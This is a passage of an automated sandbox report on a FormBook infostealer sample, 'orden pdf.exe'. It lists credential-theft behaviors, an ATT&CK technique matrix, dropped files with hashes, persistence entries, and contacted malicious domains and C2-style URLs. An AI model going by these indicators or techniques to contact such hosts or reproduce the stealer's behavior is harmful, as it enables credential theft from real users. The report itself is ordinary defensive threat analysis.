          Tries to steal Mail credentials (via file access)
          Source: C:\Windows\SysWOW64\systray.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: orden pdf.exe | Binary or memory string: WIN_81
          Source: orden pdf.exe | Binary or memory string: WIN_XP
          Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
          Source: orden pdf.exe | Binary or memory string: WIN_XPe
          Source: orden pdf.exe | Binary or memory string: WIN_VISTA
          Source: orden pdf.exe | Binary or memory string: WIN_7
          Source: orden pdf.exe | Binary or memory string: WIN_8

          Remote Access Functionality:

          Yara detected FormBook
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001C8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
          Source: C:\Users\user\Desktop\orden pdf.exe | Code function: 0_2_001C923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2Scripting11Startup Items1Startup Items1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information1Credential API Hooking1Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Valid Accounts2Application Shimming1Scripting11Input Capture31File and Directory Discovery3SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution1Registry Run Keys / Startup Folder2Valid Accounts2Obfuscated Files or Information3NTDSSystem Information Discovery117Distributed Component Object ModelCredential API Hooking1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptAccess Token Manipulation21Software Packing1LSA SecretsSecurity Software Discovery261SSHInput Capture31Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonProcess Injection512Rootkit1Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCClipboard Data2Exfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder2Masquerading2DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion3/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection512Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          [Behavior graph image not reproduced. Behavior Graph ID: 339334; Sample: orden pdf.exe; Startdate: 13/01/2021; Architecture: WINDOWS; Score: 100. Process chain shown in the graph: orden pdf.exe started two further orden pdf.exe processes, one of which injected into explorer.exe; explorer.exe started systray.exe, wscript.exe and cx9l_rq2dula.exe; systray.exe started two cmd.exe processes (each with conhost.exe); wscript.exe started DeviceCensus.exe.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          orden pdf.exe | 50% | Virustotal |
          orden pdf.exe | 33% | ReversingLabs | Win32.Trojan.Fuerboos

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe | 33% | ReversingLabs | Win32.Trojan.Fuerboos
          C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe | 33% | ReversingLabs | Win32.Trojan.Fuerboos
          C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe | 33% | ReversingLabs | Win32.Trojan.Fuerboos

          Unpacked PE Files

          Source | Detection | Scanner | Label
          2.2.orden pdf.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.orden pdf.exe.39e0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          unbelievabowboutique.com | 34.102.136.180 | true | true |  | unknown
          HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | 3.223.115.185 | true | false |  | high
          www.hydrabadproperties.com | 91.195.240.94 | true | true |  | unknown
          www.wwwswty6655.com | unknown | unknown | true |  | unknown
          www.huro14.com | unknown | unknown | true |  | unknown
          www.bepbosch.com | unknown | unknown | true |  | unknown
          www.unbelievabowboutique.com | unknown | unknown | true |  | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.hydrabadproperties.com/n7ak/ | true | Avira URL Cloud: safe | unknown
          http://www.bepbosch.com/n7ak/ | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

                                • Avira URL Cloud: safe
                                unknown
                                http://www.myultimateleadgenerator.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.wwwswty6655.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.hanaleedossmann.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.joomlas123.infoexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.healthywithhook.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.wwwswty6655.com/n7ak/www.hydrabadproperties.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fonts.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.sandoll.co.krexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.excelcapfunding.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.allworljob.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.sakkal.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.ultimatewindowusa.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.unbelievabowboutique.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.healthywithhook.com/n7ak/www.s-immotanger.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.unbelievabowboutique.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.huro14.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.huro14.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.joomlas123.info/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.unbelievabowboutique.com/n7ak/www.bepbosch.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.excelcapfunding.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.librosdecienciaficcion.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.s-immotanger.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.excelcapfunding.com/n7ak/www.allworljob.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.myultimateleadgenerator.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.wwwswty6655.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.bepbosch.com/n7ak/www.huro14.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.office4u.infoexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.wwwswty6655.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.bepbosch.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.librosdecienciaficcion.com/n7ak/MicrMexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.manfast.onlineReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.allworljob.com/n7ak/www.healthywithhook.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comlexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.joomlas123.infoReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.librosdecienciaficcion.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.office4u.info/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bepbosch.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.healthywithhook.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.ultimatewindowusa.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.hanaleedossmann.com/n7ak/explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.healthywithhook.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.hydrabadproperties.com/n7ak/www.myultimateleadgenerator.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.huro14.com/n7ak/www.wwwswty6655.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.myultimateleadgenerator.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.manfast.onlineexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.manfast.online/n7ak/www.ultimatewindowusa.comexplorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ultimatewindowusa.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.hydrabadproperties.comReferer:explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | unknown | Germany | 47846 | SEDO-ASDE | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
3.223.115.185 | unknown | United States | 14618 | AMAZON-AESUS | false

                                            General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 339334
Start date: 13.01.2021
Start time: 21:10:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 3s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: orden pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@217/11@9/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 69.3% (good quality ratio 64.2%)
• Quality average: 71.1%
• Quality standard deviation: 31%
HCA Information:
• Successful, ratio: 52%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 23.210.248.85, 51.104.144.132, 13.88.21.125, 13.64.90.137, 104.43.139.144, 51.103.5.159, 20.54.26.129, 92.122.213.194, 92.122.213.247, 104.42.151.234, 51.11.168.160, 52.155.217.156
                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
21:11:22 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
21:12:45 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run M4MLMFWXCHC C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            13012021.exeGet hashmaliciousBrowse
                                            • www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
                                            Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                            • www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct
                                            FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                            • www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
                                            6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                            • www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
                                            Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                            • www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
                                            5DY3NrVgpI.exeGet hashmaliciousBrowse
                                            • www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1
                                            xrxSVsbRli.exeGet hashmaliciousBrowse
                                            • www.luxpropertyandassociates.com/nki/?yrsdQvAx=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQnvqcJUpdIyD&D8h8=kHux

                                            Domains


                                            ASN


                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1550336
                                            Entropy (8bit):6.795101471729671
                                            Encrypted:false
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25
                                            MD5:4F1AD14256CC9C420D78D69B468BAB48
                                            SHA1:7734BEEC32B17C6EF0678533CC9634BD2C890C65
                                            SHA-256:1F05B369246B2867A66ABA3CACD9DA9C2F29C03ADC4D45883C91054C35AC3345
                                            SHA-512:38DBBF685B18D2540D739B0FF74BB00F20A1E0B1C142E40B7BBB2E451F6D8EA9E992EB01F77EFF945A47BC57FB6ADA9E184DD9D6F07E732C253449509DEEEC71
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%
                                            Reputation:low
                                            C:\Users\user\AppData\Local\Temp\DB1
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.792852251086831
                                            Encrypted:false
                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1550336
                                            Entropy (8bit):6.795101471729671
                                            Encrypted:false
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25
                                            MD5:4F1AD14256CC9C420D78D69B468BAB48
                                            SHA1:7734BEEC32B17C6EF0678533CC9634BD2C890C65
                                            SHA-256:1F05B369246B2867A66ABA3CACD9DA9C2F29C03ADC4D45883C91054C35AC3345
                                            SHA-512:38DBBF685B18D2540D739B0FF74BB00F20A1E0B1C142E40B7BBB2E451F6D8EA9E992EB01F77EFF945A47BC57FB6ADA9E184DD9D6F07E732C253449509DEEEC71
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%
                                            Reputation:low
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logim.jpeg
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                            Category:dropped
                                            Size (bytes):109281
                                            Entropy (8bit):7.92040397877183
                                            Encrypted:false
                                            SSDEEP:3072:Ih9p38GEbg2wzYJX+djpxXZMtk2AB4s8oxWzzzTlXUFg:S9p38GEUfHVma2O78oxgD
                                            MD5:CE6475451E00631C8ED264DECD02599A
                                            SHA1:529116F09AD9A0CAAFA89239BBCA3A6D4EB50B55
                                            SHA-256:ACEEDE456C82C2EFF4D4A3E0E3325E8D9DA10479559D667F0BA5978B80BE4F17
                                            SHA-512:D1C64ECECCAC3942D39718B0F8DF922A9C189A8EF49B5E6EDBA93E345A69807C0917CE6B019488379CF3A9CB1E099BE48E40B0925E6129428A270039C9E2D950
                                            Malicious:false
                                            Reputation:low
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrg.ini
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):38
                                            Entropy (8bit):2.7883088224543333
                                            Encrypted:false
                                            SSDEEP:3:rFGQJhIl:RGQPY
                                            MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                            SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                            SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                            SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.ini
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):40
                                            Entropy (8bit):2.8420918598895937
                                            Encrypted:false
                                            SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                            MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                            SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                            SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                            SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                            Malicious:true
                                            Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                            C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrv.ini
                                            Process:C:\Windows\SysWOW64\systray.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):210
                                            Entropy (8bit):3.4669102148080584
                                            Encrypted:false
                                            SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4UABYloEoY:MlIaExGNYvOI6x4UABYlkY
                                            MD5:42A1C97322FFB332CB284007F720EC75
                                            SHA1:B824EB8A23C3669D283AD76174C80FA26412D428
                                            SHA-256:67F95B6BD635AC5B715D60133F9B5862594DBAF144049E9EED6C3A83A7432094
                                            SHA-512:AC78677E64FABF82F19F3288AAF483DBA0EF0E4C02F03AB0595B5CE3B0B61C3FB1ADD447B42EFE09B07293D85E810C90916BA2650F024C42F6D77BE7330B2D55
                                            Malicious:true
                                            Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.s.e.o.z.m.t.d.q.z.l.i.u.r.x.....A.u.t.:.......P.a.s.s.:.......
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
